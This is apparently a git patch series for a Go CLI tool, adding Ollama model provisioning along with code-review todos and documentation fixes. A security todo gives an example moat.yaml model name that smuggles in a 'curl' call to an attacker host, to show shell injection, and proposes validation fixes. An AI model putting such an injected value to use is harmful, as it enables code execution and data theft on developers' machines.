(`buildProvisionCmds`), executed in `docker_service.go:89` and `apple_service.go:97` +- **Existing pattern**: `ExtraCmd` also uses placeholder substitution, but those values come from the compiled-in registry, not user config + +## Proposed Solutions + +### Option A: Validate provision items against a strict regex +- Validate model names match `^[a-zA-Z0-9][a-zA-Z0-9._/-]*(:[a-zA-Z0-9._-]+)?$` before interpolation +- **Pros**: Simple, minimal code change, catches injection attempts +- **Cons**: Regex must be maintained as Ollama's naming conventions evolve; other future services may have different valid characters +- **Effort**: Small +- **Risk**: Low + +### Option B: Avoid `sh -c` entirely for provisioning +- Restructure `ProvisionCmd` from a shell template string into a structured command with separate args (e.g., `["ollama", "pull", "{item}"]`) +- **Pros**: Eliminates shell injection entirely at the design level +- **Cons**: Requires registry format change, more invasive, breaks the simple `provision_cmd` string pattern +- **Effort**: Medium +- **Risk**: Medium (interface change) + +### Option C: Generic item validation at the framework level +- Add an optional `provision_item_pattern` field to `ServiceDef` (e.g., `^[a-zA-Z0-9._/:@-]+$`), validate items against it in `buildServiceConfig` +- **Pros**: Each service defines its own valid item pattern; no hardcoded Ollama knowledge +- **Cons**: Slightly more complex registry format +- **Effort**: Small-Medium +- **Risk**: Low + +## Recommended Action + +Option A for the immediate fix (quickest to unblock), consider Option C as a follow-up for the generic pattern. + +## Technical Details + +- **Affected files**: `internal/run/services.go`, `internal/deps/types.go` (if adding validation pattern) +- **Components**: Service provisioning pipeline + +## Acceptance Criteria + +- [ ] Provision items containing shell metacharacters (`;`, `|`, `$`, `` ` ``, `&`) are rejected with a clear error +- [ ] Valid Ollama model names (e.g., `qwen2.5-coder:7b`, `nomic-embed-text`, `library/model:tag`) pass validation +- [ ] Unit test covers injection attempt + +## Work Log + +| Date | Action | Learnings | +|------|--------|-----------| +| 2026-03-17 | Created from code review | Security + Architecture agents both flagged this | + +## Resources + +- Ollama model naming: `[namespace/]model[:tag]` +- Existing `ExtraCmd` pattern uses registry-defined (not user-defined) values diff --git a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md new file mode 100644 index 00000000..2ee87ca7 --- /dev/null +++ b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md @@ -0,0 +1,54 @@ +--- +status: pending +priority: p1 +issue_id: "002" +tags: [code-review, quality, agent-native] +dependencies: [] +--- + +# Error Messages Reference Nonexistent `--service` Flag + +## Problem Statement + +Error messages in `internal/run/manager.go` tell users to run `moat logs --service `, but the `moat logs` command has no `--service` flag. Both the readiness failure and provisioning failure error paths produce this suggestion. An agent or human following the suggested command gets an "unknown flag" error — a dead end for debugging. + +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/run/manager.go:1960` (readiness failure) and `internal/run/manager.go:1976` (provisioning failure) +- **Verified**: `cmd/moat/cli/logs.go` has no `--service` flag + +## Proposed Solutions + +### Option A: Remove `--service` from error messages +- Change hints to `moat logs ` (which does exist and shows all logs) +- **Pros**: Immediate fix, no new feature needed +- **Cons**: Less specific — user sees all logs, not just service logs +- **Effort**: Small (2 lines) +- **Risk**: None + +### Option B: Implement `--service` flag on `moat logs` +- Add filtering by service container name to the logs command +- **Pros**: Better UX, error messages become correct +- **Cons**: More work, separate feature +- **Effort**: Medium +- **Risk**: Low + +## Recommended Action + +Option A immediately (fix the error messages), Option B as a separate follow-up feature. + +## Technical Details + +- **Affected files**: `internal/run/manager.go` + +## Acceptance Criteria + +- [ ] Error messages reference only commands/flags that exist +- [ ] Running the suggested command actually works + +## Work Log + +| Date | Action | Learnings | +|------|--------|-----------| +| 2026-03-17 | Created from code review | Agent-native reviewer caught this | diff --git a/todos/003-pending-p2-cache-directory-permissions.md b/todos/003-pending-p2-cache-directory-permissions.md new file mode 100644 index 00000000..4487d2d5 --- /dev/null +++ b/todos/003-pending-p2-cache-directory-permissions.md @@ -0,0 +1,27 @@ +--- +status: pending +priority: p2 +issue_id: "003" +tags: [code-review, security] +dependencies: [] +--- + +# Cache Directory Permissions Too Permissive + +## Problem Statement + +Cache directory `~/.moat/cache//` is created with `os.MkdirAll(path, 0o755)` (world-readable). Lock file created with `0o644`. On shared systems, any local user can read cached model data. + +## Findings + +- **Source**: Security Sentinel +- **Location**: `internal/run/manager.go:1912` (MkdirAll), `internal/run/services.go:252` (lock file) + +## Proposed Solutions + +Change `0o755` to `0o700` and `0o644` to `0o600`. One-line fixes each. + +## Acceptance Criteria + +- [ ] Cache directory created with `0o700` +- [ ] Lock file created with `0o600` diff --git a/todos/004-pending-p2-provision-timeout-per-batch.md b/todos/004-pending-p2-provision-timeout-per-batch.md new file mode 100644 index 00000000..d147df16 --- /dev/null +++ b/todos/004-pending-p2-provision-timeout-per-batch.md @@ -0,0 +1,37 @@ +--- +status: pending +priority: p2 +issue_id: "004" +tags: [code-review, performance] +dependencies: [] +--- + +# Provision Timeout is Per-Batch, Not Per-Item + +## Problem Statement + +The 30-minute `provisionTimeout` covers ALL provision commands combined. For large models (70B at ~40GB), a single pull can exceed 30 minutes on slower connections. Multiple large models will certainly exceed it. + +## Findings + +- **Source**: Performance Oracle, Agent-Native Reviewer +- **Location**: `internal/run/services.go:222,245` + +## Proposed Solutions + +### Option A: Per-item timeout +Move `context.WithTimeout` inside `ProvisionService` loop so each command gets 30 minutes. +- **Effort**: Small (move timeout into loop) + +### Option B: Configurable timeout +Add `provision_timeout` to service config. Default 30min per item. +- **Effort**: Medium + +## Recommended Action + +Option A immediately (simple, correct). Option B as future work. + +## Acceptance Criteria + +- [ ] Each provision command gets its own 30-minute timeout +- [ ] Total provision time is bounded only by number_of_items * 30min diff --git a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md new file mode 100644 index 00000000..e1dcff4a --- /dev/null +++ b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md @@ -0,0 +1,42 @@ +--- +status: pending +priority: p2 +issue_id: "005" +tags: [code-review, performance] +dependencies: [] +--- + +# Exclusive flock Blocks All Parallel Runs + +## Problem Statement + +The flock in `provisionService` is held for the entire provision phase. If two `moat run` invocations both declare Ollama with models, the second blocks entirely until the first finishes pulling ALL its models — even if the models are different and wouldn't conflict. + +`ollama pull` is idempotent and uses content-addressed blob storage internally. Two concurrent pulls of different models do not corrupt each other. + +## Findings + +- **Source**: Performance Oracle +- **Location**: `internal/run/services.go:250-261` +- **Impact at 10x concurrent runs**: Linear queue. 10 runs each pulling a 7B model could mean 1-2 hours wait for the last run. + +## Proposed Solutions + +### Option A: Remove flock, rely on Ollama's internal locking +- **Pros**: Simplest, Ollama handles concurrent blob access +- **Cons**: Risk if Ollama's internal locking has edge cases +- **Effort**: Small (delete ~10 lines) + +### Option B: Per-model lock files +- Lock on `~/.moat/cache/ollama/.lock.` instead of a single lock +- **Pros**: Allows parallel pulls of different models +- **Cons**: More lock files to manage +- **Effort**: Small-Medium + +## Recommended Action + +Test whether concurrent `ollama pull` of different models is safe. If so, Option A. Otherwise, Option B. + +## Acceptance Criteria + +- [ ] Parallel `moat run` invocations with different Ollama models don't serialize unnecessarily diff --git a/todos/006-pending-p2-provision-output-not-stored.md b/todos/006-pending-p2-provision-output-not-stored.md new file mode 100644 index 00000000..30dce164 --- /dev/null +++ b/todos/006-pending-p2-provision-output-not-stored.md @@ -0,0 +1,36 @@ +--- +status: pending +priority: p2 +issue_id: "006" +tags: [code-review, agent-native] +dependencies: [] +--- + +# Provision Output Not Captured to Run Store + +## Problem Statement + +Provision output (model pull progress) goes to `os.Stderr` but is not captured to the run's log store. In non-interactive mode (CI, automated callers), stderr may not be preserved. There is no way to retrieve provision output after the fact via `moat logs`. + +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/run/manager.go:1968` — `provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr)` + +## Proposed Solutions + +Tee provision output to both `os.Stderr` and the run's `storage.LogWriter` using `io.MultiWriter`. + +However, the `RunStore` is created after container creation (line 2148), which is after service provisioning. Capturing provision output to the store would require either: +- Moving store creation earlier in the `Create` flow (medium effort, risk of breaking other flows) +- Buffering provision output and flushing after store is available (adds complexity) + +- **Effort**: Medium (due to store creation ordering) +- **Risk**: Low-Medium + +**Deferred** — provision output streams to stderr during the run, which is sufficient for interactive use. Store capture is a follow-up. + +## Acceptance Criteria + +- [ ] Provision output is retrievable via `moat logs ` after the run +- [ ] Provision output still streams to stderr during the run diff --git a/todos/007-pending-p3-duplicated-extra-env-loop.md b/todos/007-pending-p3-duplicated-extra-env-loop.md new file mode 100644 index 00000000..8b1b1022 --- /dev/null +++ b/todos/007-pending-p3-duplicated-extra-env-loop.md @@ -0,0 +1,24 @@ +--- +status: pending +priority: p3 +issue_id: "007" +tags: [code-review, quality] +dependencies: [] +--- + +# Duplicated extra_env Loop in buildServiceConfig + +## Problem Statement + +The `for k, v := range spec.Service.ExtraEnv` loop is duplicated between the `needsPassword` and `!needsPassword` branches. The only difference is whether `{password}` substitution happens. Can be consolidated into a single loop since `strings.ReplaceAll` with empty password is a no-op. + +## Findings + +- **Source**: Code Simplicity Reviewer +- **Location**: `internal/run/services.go:150-162` +- **Impact**: ~5 LOC reduction + +## Acceptance Criteria + +- [ ] Single `extra_env` loop after password generation +- [ ] Existing tests still pass diff --git a/todos/008-pending-p3-silent-unknown-scalar-keys.md b/todos/008-pending-p3-silent-unknown-scalar-keys.md new file mode 100644 index 00000000..6ea5244d --- /dev/null +++ b/todos/008-pending-p3-silent-unknown-scalar-keys.md @@ -0,0 +1,26 @@ +--- +status: pending +priority: p3 +issue_id: "008" +tags: [code-review, quality] +dependencies: [] +--- + +# Unknown Scalar Keys in ServiceSpec Silently Ignored + +## Problem Statement + +`ServiceSpec.UnmarshalYAML` only captures unknown keys that have sequence values into `Extra`. If a user writes `services.ollama.foo: "bar"` (a scalar), it is silently ignored — no warning, no error. The `buildServiceConfig` validation only catches keys in `Extra`. + +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/config/config.go:171-192` + +## Proposed Solutions + +Log a warning or return an error for unrecognized non-sequence keys in `UnmarshalYAML`. + +## Acceptance Criteria + +- [ ] Unknown scalar keys in service config produce a warning or error diff --git a/todos/009-pending-p3-registry-entry-consistency.md b/todos/009-pending-p3-registry-entry-consistency.md new file mode 100644 index 00000000..2ed0908c --- /dev/null +++ b/todos/009-pending-p3-registry-entry-consistency.md @@ -0,0 +1,23 @@ +--- +status: pending +priority: p3 +issue_id: "009" +tags: [code-review, quality] +dependencies: [] +--- + +# Ollama Registry Entry Missing `versions` Field + +## Problem Statement + +All existing service entries (postgres, mysql, redis) declare explicit `versions` lists. Ollama omits this. Additionally, the `image` value is unquoted (`ollama/ollama`) while others use quoted strings. + +## Findings + +- **Source**: Pattern Recognition Specialist +- **Location**: `internal/deps/registry.yaml:492-506` + +## Acceptance Criteria + +- [ ] Add `versions` list to ollama registry entry +- [ ] Quote the `image` value for consistency From 30ee8447223405d66218306a08861be3069f23cd Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:08:27 +0000 Subject: [PATCH 12/27] fix: address claude-review feedback on PR #238 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Validate scalar provision keys (e.g., `models: value` instead of list) with clear "must be a list" error message - Fix misleading flock comment — parallel runs still serialize on shared lock file; extracted provisionItem helper with defer cancel() - Remove compound-engineering.local.md (local tooling, not for repo) - Remove todos/ directory (tracked as GitHub issues instead) --- compound-engineering.local.md | 9 --- internal/run/services.go | 42 ++++++---- internal/run/services_test.go | 14 ++++ ...ng-p1-command-injection-provision-items.md | 79 ------------------- ...existent-service-flag-in-error-messages.md | 54 ------------- ...-pending-p2-cache-directory-permissions.md | 27 ------- ...-pending-p2-provision-timeout-per-batch.md | 37 --------- ...ing-p2-flock-scope-blocks-parallel-runs.md | 42 ---------- ...-pending-p2-provision-output-not-stored.md | 36 --------- ...07-pending-p3-duplicated-extra-env-loop.md | 24 ------ ...8-pending-p3-silent-unknown-scalar-keys.md | 26 ------ ...9-pending-p3-registry-entry-consistency.md | 23 ------ 12 files changed, 39 insertions(+), 374 deletions(-) delete mode 100644 compound-engineering.local.md delete mode 100644 todos/001-pending-p1-command-injection-provision-items.md delete mode 100644 todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md delete mode 100644 todos/003-pending-p2-cache-directory-permissions.md delete mode 100644 todos/004-pending-p2-provision-timeout-per-batch.md delete mode 100644 todos/005-pending-p2-flock-scope-blocks-parallel-runs.md delete mode 100644 todos/006-pending-p2-provision-output-not-stored.md delete mode 100644 todos/007-pending-p3-duplicated-extra-env-loop.md delete mode 100644 todos/008-pending-p3-silent-unknown-scalar-keys.md delete mode 100644 todos/009-pending-p3-registry-entry-consistency.md diff --git a/compound-engineering.local.md b/compound-engineering.local.md deleted file mode 100644 index 55a63512..00000000 --- a/compound-engineering.local.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -review_agents: - - architecture-strategist - - security-sentinel - - performance-oracle - - pattern-recognition-specialist ---- - -Go CLI project (moat). Review for Go idioms, error handling, interface design, and test coverage. diff --git a/internal/run/services.go b/internal/run/services.go index 4c6a71cf..145cc1e5 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -175,6 +175,13 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv // Resolve provisions from user spec Extra using registry's provisions_key var provisions []string if userSpec != nil && spec.Service.ProvisionsKey != "" { + // Check if key is present but was a scalar (nil) instead of a list + if val, exists := userSpec.Extra[spec.Service.ProvisionsKey]; exists && val == nil { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s must be a list, not a scalar value", + dep.Name, spec.Service.ProvisionsKey, + ) + } provisions = userSpec.Extra[spec.Service.ProvisionsKey] // Validate: reject unknown Extra keys that don't match provisions_key @@ -272,30 +279,31 @@ func provisionService(ctx context.Context, mgr container.ServiceManager, info co } for _, cmd := range cmds { - // Per-item timeout: each provision command gets its own deadline. - cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) - - // Acquire lock per-item so parallel runs pulling different items don't serialize. - if lockFile != nil { - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - cancel() - return fmt.Errorf("acquiring cache lock: %w", err) - } + if err := provisionItem(ctx, mgr, info, cmd, lockFile, stdout); err != nil { + return err } + } - err := mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) + return nil +} - if lockFile != nil { - _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) - } - cancel() +// provisionItem runs a single provision command with its own timeout and lock scope. +// The lock is shared across parallel moat runs — concurrent runs pulling different +// models will still serialize on this single lock file. See todo/005 for narrowing +// to per-model locks. +func provisionItem(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cmd string, lockFile *os.File, stdout io.Writer) error { + cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) + defer cancel() - if err != nil { - return err + // Acquire/release lock per-item to avoid holding it across the full batch. + if lockFile != nil { + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) } + defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } - return nil + return mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) } // waitForServiceReady polls CheckReady until success or timeout. diff --git a/internal/run/services_test.go b/internal/run/services_test.go index af5c3bec..af01b53c 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -212,6 +212,20 @@ func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { assert.Contains(t, err.Error(), "model") } +func TestBuildServiceConfigRejectsScalarProvisions(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": nil, // scalar value captured as nil by UnmarshalYAML + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "must be a list") +} + func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} diff --git a/todos/001-pending-p1-command-injection-provision-items.md b/todos/001-pending-p1-command-injection-provision-items.md deleted file mode 100644 index 2053842e..00000000 --- a/todos/001-pending-p1-command-injection-provision-items.md +++ /dev/null @@ -1,79 +0,0 @@ ---- -status: pending -priority: p1 -issue_id: "001" -tags: [code-review, security] -dependencies: [] ---- - -# Command Injection via Provision Item Names - -## Problem Statement - -User-supplied model names from `moat.yaml` are interpolated directly into a shell command template via `strings.ReplaceAll(cmdTemplate, "{item}", item)` and executed via `sh -c` inside the service container. There is zero validation or sanitization of the model name strings. - -A `moat.yaml` like: -```yaml -services: - ollama: - models: - - "qwen2.5-coder:7b; curl http://attacker.com/exfil" -``` -produces `ollama pull qwen2.5-coder:7b; curl http://attacker.com/exfil` passed to `sh -c`. - -While `moat.yaml` is user-authored (so the threat model is "user trusts their own config"), a malicious repository with a checked-in `moat.yaml` could exploit developers who clone and `moat run`. Combined with the host-writable cache mount, this allows writing arbitrary files to `~/.moat/cache/ollama/` on the host. - -## Findings - -- **Source**: Security Sentinel, Architecture Strategist -- **Location**: `internal/run/services.go:225-233` (`buildProvisionCmds`), executed in `docker_service.go:89` and `apple_service.go:97` -- **Existing pattern**: `ExtraCmd` also uses placeholder substitution, but those values come from the compiled-in registry, not user config - -## Proposed Solutions - -### Option A: Validate provision items against a strict regex -- Validate model names match `^[a-zA-Z0-9][a-zA-Z0-9._/-]*(:[a-zA-Z0-9._-]+)?$` before interpolation -- **Pros**: Simple, minimal code change, catches injection attempts -- **Cons**: Regex must be maintained as Ollama's naming conventions evolve; other future services may have different valid characters -- **Effort**: Small -- **Risk**: Low - -### Option B: Avoid `sh -c` entirely for provisioning -- Restructure `ProvisionCmd` from a shell template string into a structured command with separate args (e.g., `["ollama", "pull", "{item}"]`) -- **Pros**: Eliminates shell injection entirely at the design level -- **Cons**: Requires registry format change, more invasive, breaks the simple `provision_cmd` string pattern -- **Effort**: Medium -- **Risk**: Medium (interface change) - -### Option C: Generic item validation at the framework level -- Add an optional `provision_item_pattern` field to `ServiceDef` (e.g., `^[a-zA-Z0-9._/:@-]+$`), validate items against it in `buildServiceConfig` -- **Pros**: Each service defines its own valid item pattern; no hardcoded Ollama knowledge -- **Cons**: Slightly more complex registry format -- **Effort**: Small-Medium -- **Risk**: Low - -## Recommended Action - -Option A for the immediate fix (quickest to unblock), consider Option C as a follow-up for the generic pattern. - -## Technical Details - -- **Affected files**: `internal/run/services.go`, `internal/deps/types.go` (if adding validation pattern) -- **Components**: Service provisioning pipeline - -## Acceptance Criteria - -- [ ] Provision items containing shell metacharacters (`;`, `|`, `$`, `` ` ``, `&`) are rejected with a clear error -- [ ] Valid Ollama model names (e.g., `qwen2.5-coder:7b`, `nomic-embed-text`, `library/model:tag`) pass validation -- [ ] Unit test covers injection attempt - -## Work Log - -| Date | Action | Learnings | -|------|--------|-----------| -| 2026-03-17 | Created from code review | Security + Architecture agents both flagged this | - -## Resources - -- Ollama model naming: `[namespace/]model[:tag]` -- Existing `ExtraCmd` pattern uses registry-defined (not user-defined) values diff --git a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md deleted file mode 100644 index 2ee87ca7..00000000 --- a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md +++ /dev/null @@ -1,54 +0,0 @@ ---- -status: pending -priority: p1 -issue_id: "002" -tags: [code-review, quality, agent-native] -dependencies: [] ---- - -# Error Messages Reference Nonexistent `--service` Flag - -## Problem Statement - -Error messages in `internal/run/manager.go` tell users to run `moat logs --service `, but the `moat logs` command has no `--service` flag. Both the readiness failure and provisioning failure error paths produce this suggestion. An agent or human following the suggested command gets an "unknown flag" error — a dead end for debugging. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/run/manager.go:1960` (readiness failure) and `internal/run/manager.go:1976` (provisioning failure) -- **Verified**: `cmd/moat/cli/logs.go` has no `--service` flag - -## Proposed Solutions - -### Option A: Remove `--service` from error messages -- Change hints to `moat logs ` (which does exist and shows all logs) -- **Pros**: Immediate fix, no new feature needed -- **Cons**: Less specific — user sees all logs, not just service logs -- **Effort**: Small (2 lines) -- **Risk**: None - -### Option B: Implement `--service` flag on `moat logs` -- Add filtering by service container name to the logs command -- **Pros**: Better UX, error messages become correct -- **Cons**: More work, separate feature -- **Effort**: Medium -- **Risk**: Low - -## Recommended Action - -Option A immediately (fix the error messages), Option B as a separate follow-up feature. - -## Technical Details - -- **Affected files**: `internal/run/manager.go` - -## Acceptance Criteria - -- [ ] Error messages reference only commands/flags that exist -- [ ] Running the suggested command actually works - -## Work Log - -| Date | Action | Learnings | -|------|--------|-----------| -| 2026-03-17 | Created from code review | Agent-native reviewer caught this | diff --git a/todos/003-pending-p2-cache-directory-permissions.md b/todos/003-pending-p2-cache-directory-permissions.md deleted file mode 100644 index 4487d2d5..00000000 --- a/todos/003-pending-p2-cache-directory-permissions.md +++ /dev/null @@ -1,27 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "003" -tags: [code-review, security] -dependencies: [] ---- - -# Cache Directory Permissions Too Permissive - -## Problem Statement - -Cache directory `~/.moat/cache//` is created with `os.MkdirAll(path, 0o755)` (world-readable). Lock file created with `0o644`. On shared systems, any local user can read cached model data. - -## Findings - -- **Source**: Security Sentinel -- **Location**: `internal/run/manager.go:1912` (MkdirAll), `internal/run/services.go:252` (lock file) - -## Proposed Solutions - -Change `0o755` to `0o700` and `0o644` to `0o600`. One-line fixes each. - -## Acceptance Criteria - -- [ ] Cache directory created with `0o700` -- [ ] Lock file created with `0o600` diff --git a/todos/004-pending-p2-provision-timeout-per-batch.md b/todos/004-pending-p2-provision-timeout-per-batch.md deleted file mode 100644 index d147df16..00000000 --- a/todos/004-pending-p2-provision-timeout-per-batch.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "004" -tags: [code-review, performance] -dependencies: [] ---- - -# Provision Timeout is Per-Batch, Not Per-Item - -## Problem Statement - -The 30-minute `provisionTimeout` covers ALL provision commands combined. For large models (70B at ~40GB), a single pull can exceed 30 minutes on slower connections. Multiple large models will certainly exceed it. - -## Findings - -- **Source**: Performance Oracle, Agent-Native Reviewer -- **Location**: `internal/run/services.go:222,245` - -## Proposed Solutions - -### Option A: Per-item timeout -Move `context.WithTimeout` inside `ProvisionService` loop so each command gets 30 minutes. -- **Effort**: Small (move timeout into loop) - -### Option B: Configurable timeout -Add `provision_timeout` to service config. Default 30min per item. -- **Effort**: Medium - -## Recommended Action - -Option A immediately (simple, correct). Option B as future work. - -## Acceptance Criteria - -- [ ] Each provision command gets its own 30-minute timeout -- [ ] Total provision time is bounded only by number_of_items * 30min diff --git a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md deleted file mode 100644 index e1dcff4a..00000000 --- a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "005" -tags: [code-review, performance] -dependencies: [] ---- - -# Exclusive flock Blocks All Parallel Runs - -## Problem Statement - -The flock in `provisionService` is held for the entire provision phase. If two `moat run` invocations both declare Ollama with models, the second blocks entirely until the first finishes pulling ALL its models — even if the models are different and wouldn't conflict. - -`ollama pull` is idempotent and uses content-addressed blob storage internally. Two concurrent pulls of different models do not corrupt each other. - -## Findings - -- **Source**: Performance Oracle -- **Location**: `internal/run/services.go:250-261` -- **Impact at 10x concurrent runs**: Linear queue. 10 runs each pulling a 7B model could mean 1-2 hours wait for the last run. - -## Proposed Solutions - -### Option A: Remove flock, rely on Ollama's internal locking -- **Pros**: Simplest, Ollama handles concurrent blob access -- **Cons**: Risk if Ollama's internal locking has edge cases -- **Effort**: Small (delete ~10 lines) - -### Option B: Per-model lock files -- Lock on `~/.moat/cache/ollama/.lock.` instead of a single lock -- **Pros**: Allows parallel pulls of different models -- **Cons**: More lock files to manage -- **Effort**: Small-Medium - -## Recommended Action - -Test whether concurrent `ollama pull` of different models is safe. If so, Option A. Otherwise, Option B. - -## Acceptance Criteria - -- [ ] Parallel `moat run` invocations with different Ollama models don't serialize unnecessarily diff --git a/todos/006-pending-p2-provision-output-not-stored.md b/todos/006-pending-p2-provision-output-not-stored.md deleted file mode 100644 index 30dce164..00000000 --- a/todos/006-pending-p2-provision-output-not-stored.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "006" -tags: [code-review, agent-native] -dependencies: [] ---- - -# Provision Output Not Captured to Run Store - -## Problem Statement - -Provision output (model pull progress) goes to `os.Stderr` but is not captured to the run's log store. In non-interactive mode (CI, automated callers), stderr may not be preserved. There is no way to retrieve provision output after the fact via `moat logs`. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/run/manager.go:1968` — `provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr)` - -## Proposed Solutions - -Tee provision output to both `os.Stderr` and the run's `storage.LogWriter` using `io.MultiWriter`. - -However, the `RunStore` is created after container creation (line 2148), which is after service provisioning. Capturing provision output to the store would require either: -- Moving store creation earlier in the `Create` flow (medium effort, risk of breaking other flows) -- Buffering provision output and flushing after store is available (adds complexity) - -- **Effort**: Medium (due to store creation ordering) -- **Risk**: Low-Medium - -**Deferred** — provision output streams to stderr during the run, which is sufficient for interactive use. Store capture is a follow-up. - -## Acceptance Criteria - -- [ ] Provision output is retrievable via `moat logs ` after the run -- [ ] Provision output still streams to stderr during the run diff --git a/todos/007-pending-p3-duplicated-extra-env-loop.md b/todos/007-pending-p3-duplicated-extra-env-loop.md deleted file mode 100644 index 8b1b1022..00000000 --- a/todos/007-pending-p3-duplicated-extra-env-loop.md +++ /dev/null @@ -1,24 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "007" -tags: [code-review, quality] -dependencies: [] ---- - -# Duplicated extra_env Loop in buildServiceConfig - -## Problem Statement - -The `for k, v := range spec.Service.ExtraEnv` loop is duplicated between the `needsPassword` and `!needsPassword` branches. The only difference is whether `{password}` substitution happens. Can be consolidated into a single loop since `strings.ReplaceAll` with empty password is a no-op. - -## Findings - -- **Source**: Code Simplicity Reviewer -- **Location**: `internal/run/services.go:150-162` -- **Impact**: ~5 LOC reduction - -## Acceptance Criteria - -- [ ] Single `extra_env` loop after password generation -- [ ] Existing tests still pass diff --git a/todos/008-pending-p3-silent-unknown-scalar-keys.md b/todos/008-pending-p3-silent-unknown-scalar-keys.md deleted file mode 100644 index 6ea5244d..00000000 --- a/todos/008-pending-p3-silent-unknown-scalar-keys.md +++ /dev/null @@ -1,26 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "008" -tags: [code-review, quality] -dependencies: [] ---- - -# Unknown Scalar Keys in ServiceSpec Silently Ignored - -## Problem Statement - -`ServiceSpec.UnmarshalYAML` only captures unknown keys that have sequence values into `Extra`. If a user writes `services.ollama.foo: "bar"` (a scalar), it is silently ignored — no warning, no error. The `buildServiceConfig` validation only catches keys in `Extra`. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/config/config.go:171-192` - -## Proposed Solutions - -Log a warning or return an error for unrecognized non-sequence keys in `UnmarshalYAML`. - -## Acceptance Criteria - -- [ ] Unknown scalar keys in service config produce a warning or error diff --git a/todos/009-pending-p3-registry-entry-consistency.md b/todos/009-pending-p3-registry-entry-consistency.md deleted file mode 100644 index 2ed0908c..00000000 --- a/todos/009-pending-p3-registry-entry-consistency.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "009" -tags: [code-review, quality] -dependencies: [] ---- - -# Ollama Registry Entry Missing `versions` Field - -## Problem Statement - -All existing service entries (postgres, mysql, redis) declare explicit `versions` lists. Ollama omits this. Additionally, the `image` value is unquoted (`ollama/ollama`) while others use quoted strings. - -## Findings - -- **Source**: Pattern Recognition Specialist -- **Location**: `internal/deps/registry.yaml:492-506` - -## Acceptance Criteria - -- [ ] Add `versions` list to ollama registry entry -- [ ] Quote the `image` value for consistency From b0326927d347a47062af5476abb616906613c54a Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:14:52 +0000 Subject: [PATCH 13/27] fix: address round 2 claude-review feedback on PR #238 - Fix readiness table: Ollama check is just "ollama list", model pulling is a separate provisioning step - Add provisioning step (step 6) to startup sequence docs - Fix security model docs: not all services require passwords (Ollama has no auth, relies on network isolation) - Remove dead todo/005 reference from provisionItem comment --- docs/content/guides/08-services.md | 9 +++++---- internal/run/services.go | 3 +-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index 4cc4b4c7..0012c44e 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -158,8 +158,9 @@ The agent must retry connections until the service is ready. This is useful when 3. Pull service images (if not cached) 4. Start service containers in parallel on the network 5. Run readiness checks (poll every 1 second, timeout after 30 seconds) -6. Inject `MOAT_*` environment variables -7. Start the agent container on the same network +6. Run provisioning commands, if any (e.g., pull Ollama models) +7. Inject `MOAT_*` environment variables +8. Start the agent container on the same network ### Shutdown sequence @@ -189,7 +190,7 @@ Each service has a built-in readiness command: | `postgres` | `pg_isready -h localhost -U postgres` | | `mysql` | `mysqladmin ping -h localhost -u root --password=` | | `redis` | `redis-cli -a PING` | -| `ollama` | `ollama list` + pull declared models | +| `ollama` | `ollama list` | Readiness checks run inside the service container via `docker exec`. They verify that the service 